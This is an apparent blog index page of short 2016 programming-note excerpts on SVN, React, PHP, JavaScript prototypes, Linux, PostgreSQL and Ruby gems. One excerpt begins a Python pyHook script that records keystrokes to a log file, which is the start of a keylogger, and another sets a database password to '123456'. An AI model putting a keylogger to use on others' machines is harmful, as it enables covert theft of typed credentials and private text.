上一页 1 ··· 3 4 5 6 7 8 下一页
摘要: svn: E205009: Local, non-commit operations do not take a log message or revision properties svn copy http://xx http://xx/xx -m 'xx' => "xx" 阅读全文
posted @ 2016-12-06 10:47 anjunact 阅读(708) 评论(0) 推荐(0) 编辑
摘要: 1. import a from './xx' 一定要有 ./ 2. export default const x={} 错 改为 const x={}; export default x; 也就是要分开写 3. this.setState({}) 只有这样才会更新render 不要 this.st 阅读全文
posted @ 2016-12-02 22:02 anjunact 阅读(94) 评论(0) 推荐(0) 编辑
摘要: $ids1 = implode(",",$upload_ids);if(!empty($upload_ids)){ $ids_db= pdo_fetchall('select id from '.tablename('xx').' where FIND_IN_SET(id, :ids) and un 阅读全文
posted @ 2016-11-29 16:54 anjunact 阅读(303) 评论(0) 推荐(0) 编辑
摘要: 在PHPExcel_IOFactory::createWriter($objPHPExcel, 'Excel2007'); 后面加一行 ob_clean(); 阅读全文
posted @ 2016-11-29 10:07 anjunact 阅读(756) 评论(0) 推荐(0) 编辑
摘要: +new Date(); 转为数字 一切(引用类型)都是对象,对象是属性的集合对象都是通过函数创建的每个函数function都有一个prototype每个对象都有一个__proto__Object.prototype确实一个特例——它的__proto__指向的是null,切记切记var obj={} 阅读全文
posted @ 2016-11-19 07:40 anjunact 阅读(116) 评论(0) 推荐(0) 编辑
摘要: package.json ENOSPC 文件监控增加一些 echo fs.inotify.max_user_watches=582222 | sudo tee -a /etc/sysctl.conf && sudo sysctl -phttp://andrewhfarmer.com/starter- 阅读全文
posted @ 2016-11-18 11:34 anjunact 阅读(114) 评论(0) 推荐(0) 编辑
摘要: https://github.com/twbs/bootstrap https://github.com/semantic-org/semantic-ui/ https://github.com/zurb/foundation-sites https://github.com/dogfalo/materialize/ https://github.com/callemall/material-ui... 阅读全文
posted @ 2016-11-15 18:02 anjunact 阅读(144) 评论(0) 推荐(0) 编辑
摘要: import pyHookimport sysimport pythoncomimport loggingfile_log = 'C:\\important\\log.txt'def OnKeyboardEvent(event): logging.basicConfig(filename = file_log, level = logging.DEBUG, format = '%(messa... 阅读全文
posted @ 2016-11-13 22:50 anjunact 阅读(207) 评论(0) 推荐(0) 编辑
摘要: ubuntu下 修改postgres数据库用户的密码为123456 sudo -u postgres psql postgres=# ALTER USER postgres WITH PASSWORD '123456'; 修改ubuntu操作系统的postgres用户的密码(密码要与数据库用户postgres的密码相同) sudo passwd –d postgres sudo -u postg... 阅读全文
posted @ 2016-11-13 12:25 anjunact 阅读(450) 评论(0) 推荐(0) 编辑
摘要: http://ruby-toolbox.com/ ~/.gemrc --- :backtrace: false :benchmark: false :bulk_threshold: 1000 :sources: - http://ruby.taobao.org :update_sources: true :verbose: true gem: --no-docume... 阅读全文
posted @ 2016-11-13 10:10 anjunact 阅读(248) 评论(0) 推荐(0) 编辑
上一页 1 ··· 3 4 5 6 7 8 下一页